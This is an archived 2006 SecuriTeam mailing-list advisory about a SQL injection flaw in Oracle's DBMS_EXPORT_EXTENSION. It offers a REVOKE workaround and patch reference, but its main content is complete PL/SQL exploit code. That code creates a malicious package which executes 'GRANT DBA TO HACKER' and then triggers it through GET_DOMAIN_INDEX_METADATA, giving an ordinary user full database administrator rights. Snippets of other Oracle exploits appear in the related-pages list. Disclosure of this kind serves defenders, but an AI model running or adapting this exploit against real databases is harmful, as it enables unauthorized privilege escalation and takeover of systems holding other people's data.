[EXPL] SQL Injection via Oracle DBMS_EXPORT_EXTENSION in Oracle (Exploit)
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 27 Apr 2006 14:05:21 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
SQL Injection via Oracle DBMS_EXPORT_EXTENSION in Oracle (Exploit)
------------------------------------------------------------------------
SUMMARY
The attached source exploits the recently discovered SQL injection
vulnerability in DBMS_EXPORT_EXTENSION.
DETAILS
Workarounds:
Change permission on the database by running:
REVOKE EXECUTE ON SYS.DBMS_EXPORT_EXTENSION FROM PUBLIC FORCE;
REVOKE EXECUTE ON SYS.DBMS_EXPORT_EXTENSION FROM PUBLIC FORCE;
Solution:
<http://www.oracle.com/technology/deploy/security/pdf/cpuapr2006.html>
Oracle Critical Patch Update - April 2006 Addresses this vulnerability, as
well as other 35 security issues.
Exploit Code:
/*
* F***ing NON-0 day($) exploit for Oracle 10g 10.2.0.2.0
*
* Patch your database now!
*
* by N1V1Hd $3c41r3
*
*/
CREATE OR REPLACE
PACKAGE MYBADPACKAGE AUTHID CURRENT_USER
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER;
END;
/
CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER
IS
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO HACKER';
COMMIT;
RETURN(1);
END;
END;
/
DECLARE
INDEX_NAME VARCHAR2(200);
INDEX_SCHEMA VARCHAR2(200);
TYPE_NAME VARCHAR2(200);
TYPE_SCHEMA VARCHAR2(200);
VERSION VARCHAR2(200);
NEWBLOCK PLS_INTEGER;
GMFLAGS NUMBER;
v_Return VARCHAR2(200);
BEGIN
INDEX_NAME := 'A1'; INDEX_SCHEMA := 'HACKER';
TYPE_NAME := 'MYBADPACKAGE'; TYPE_SCHEMA := 'HACKER';
VERSION := '10.2.0.2.0'; GMFLAGS := 1;
v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA, TYPE_NAME
-> TYPE_NAME,
TYPE_SCHEMA => TYPE_SCHEMA, VERSION => VERSION, NEWBLOCK =>
NEWBLOCK, GMFLAGS => GMFLAGS
);
END;
/
ADDITIONAL INFORMATION
The information has been provided by <mailto:hasecorp@xxxxxxxxxxx>
putosoft softputo.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [NT] Firefox Remote Code Execution and DoS
- Next by Date: [NEWS] Oracle Database Buffer Overflow (VERIFY_LOG)
- Previous by thread: [NT] Firefox Remote Code Execution and DoS
- Next by thread: [NEWS] Oracle Database Buffer Overflow (VERIFY_LOG)
- Index(es):
Relevant Pages
- [NEWS] Multiple Vulnerabilities in Oracle Database (Character Conversion, Extproc, Password Disclosu
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Multiple vulnerabilities were
discovered in the (Oracle database server ... password is required to exploit this vulnerability.
... (Securiteam) - [EXPL] Oracle Command Line Overflow (Exploit)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... A locally exploitable buffer overflow
has been found in the 'oracle' ... restricted sections of the database, ...
'print "A"x9850'` Segmentation fault ... (Securiteam) - [NEWS] Oracle Forms SQL Injection
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... part of the Oracle Developer
Suite 10g". ... All Oracle Forms applications are by default vulnerable to SQL Injection.
... The following statement sends the result of the SQL statement: ... (Securiteam) - [EXPL] Oracle (extproc) Local/Remote Command Execution (Exploit)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... The attached PL/SQL code exploits
the Oracle extproc directory traversal ... -- allows remote attackers to access arbitrary
libraries outside of the ... create or replace package oracmd32 as ... (Securiteam) - [NEWS] Oracle Database 9ir2 Interval Conversion Buffer Overflow
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Oracle Database Server
provides two functions that can be used with PL/SQL ... Exploitation of these vulnerabilities
becomes easy if Oracle ... (Securiteam)